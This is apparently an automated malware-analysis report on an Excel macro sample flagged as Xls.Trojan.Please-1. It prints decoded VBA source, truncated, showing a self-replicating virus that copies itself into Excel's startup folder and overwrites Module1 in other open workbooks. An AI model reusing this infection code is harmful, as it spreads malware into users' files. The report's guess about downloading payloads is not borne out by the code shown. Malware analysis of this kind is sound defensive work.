Xls.Trojan.Please-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 701ca5fe6a861001…

MALICIOUS

Office (OLE)

44.5 KB Created: 2000-02-14 16:37:00 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 51a7827bcdd9dcf3402a50c57d7115cf SHA-1: 74a00b01c6dcfd35e5ec44e3fc8c7cc217e3bf58 SHA-256: 701ca5fe6a8610019cbdcb07ba6015497064862f2c60ff8dcfe19a2e96034445
220 Risk Score

Malware Insights

Xls.Trojan.Please-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel workbook containing VBA macros, including Auto_Open and Auto_Close routines, which are commonly used to execute malicious code upon opening or closing the document. The presence of these macros and the ClamAV detection signature 'Xls.Trojan.Please-1' strongly indicate a malicious intent, likely to download and execute further payloads or perform other harmful actions.

Heuristics 4

  • ClamAV: Xls.Trojan.Please-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Please-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4384 bytes
SHA-256: aa0cb446c28ab7c8f2d12ad00c080b7a84c1ebd6a62732d72353929e0e82739c
Detection
ClamAV: Xls.Trojan.Please-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Rem i

Dim TM
Dim TC

Sub test()
    Application.OnWindow = "check"
End Sub

Sub Untest()
    Application.OnWindow = ""
End Sub


Sub Check_1()
    Check
End Sub

Sub Auto_Close()
    Application.OnWindow = ""
End Sub

Sub Auto_Open()
Dim NameOfCurrentWorkBook As String
Dim i
   Rem On Error Resume Next
   Application.ScreenUpdating = False
   Application.DisplayAlerts = False
   NameOfCurrentWorkBook = ThisWorkbook.Name
   If UCase(Dir(Application.StartupPath + "\Book.xls")) <> UCase("BOOK.xls") Then
    If NameOfCurrentWorkBook <> "Book.xls" Then
        Rem  Writing Book1 an Setting OnWindow
        If Workbooks.Count > 1 Then
            For i = 1 To Workbooks.Count ' check for Workbook with name Book1.xls
                If Workbooks(i).Name = "Book.xls" Then
                    Workbooks(i).Close
                End If
            Next i
        End If
        Rem writing Book1
        Set TM = ThisWorkbook.VBProject.VBComponents("module1").CodeModule
        Set NewBook1 = Application.Workbooks.Add
        Set TC = NewBook1.VBProject.VBComponents.Add(1).CodeModule
        For j = 1 To TM.CountOfLines
             TC.InsertLines j, TM.Lines(j, 1)
        Next j
        NewBook1.Activate
        ActiveWindow.Visible = False
        NewBook1.SaveAs FileName:=Application.StartupPath + "\Book.xls", AddToMru:=False
     End If
    End If
    Application.OnWindow = "Check_1"
    Application.ScreenUpdating = True
    Application.DisplayAlerts = True
End Sub

Sub Check()
Dim oldStatusBar
Dim QuantOfModules
Dim i, j As Integer
Dim ModuleExist As Boolean
Dim NameOfCurrentModule As String
Dim NewBook1

oldStatusBar = Application.DisplayStatusBar
Application.DisplayStatusBar = True
Application.ScreenUpdating = False
Application.DisplayAlerts = False
Rem On Error Resume Next
Set TM = ThisWorkbook.VBProject.VBComponents("module1").CodeModule
If TM <> Empty Then
    If Workbooks.Count > 1 Then
        For i = 2 To Workbooks.Count
            ModuleExist = False
            For j = 1 To Workbooks(i).VBProject.VBComponents.Count
                NameOfCurrentModule = Workbooks(i).VBProject.VBComponents.Item(j).Name
                If NameOfCurrentModule = "Module1" Then
                    ModuleExist = True
                End If
            Next j
            If ModuleExist <> True Then
                Set TC = Workbooks(i).VBProject.VBComponents.Add(1).CodeModule
            Else
                Set TC = Workbooks(i).VBProject.VBComponents("module1").CodeModule
            End If
            
            FirstLine = TC.Lines(1, 1)
            If FirstLine <> "Rem i" Then
                For l = 1 To TC.CountOfLines
                    TC.DeleteLines l, 1
                    Application.StatusBar = "Please be patient...-" + Str(l)
                Next l
                For j = 1 To TM.CountOfLines
                    TC.InsertLines j, TM.Lines(j, 1)
                    Appli
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.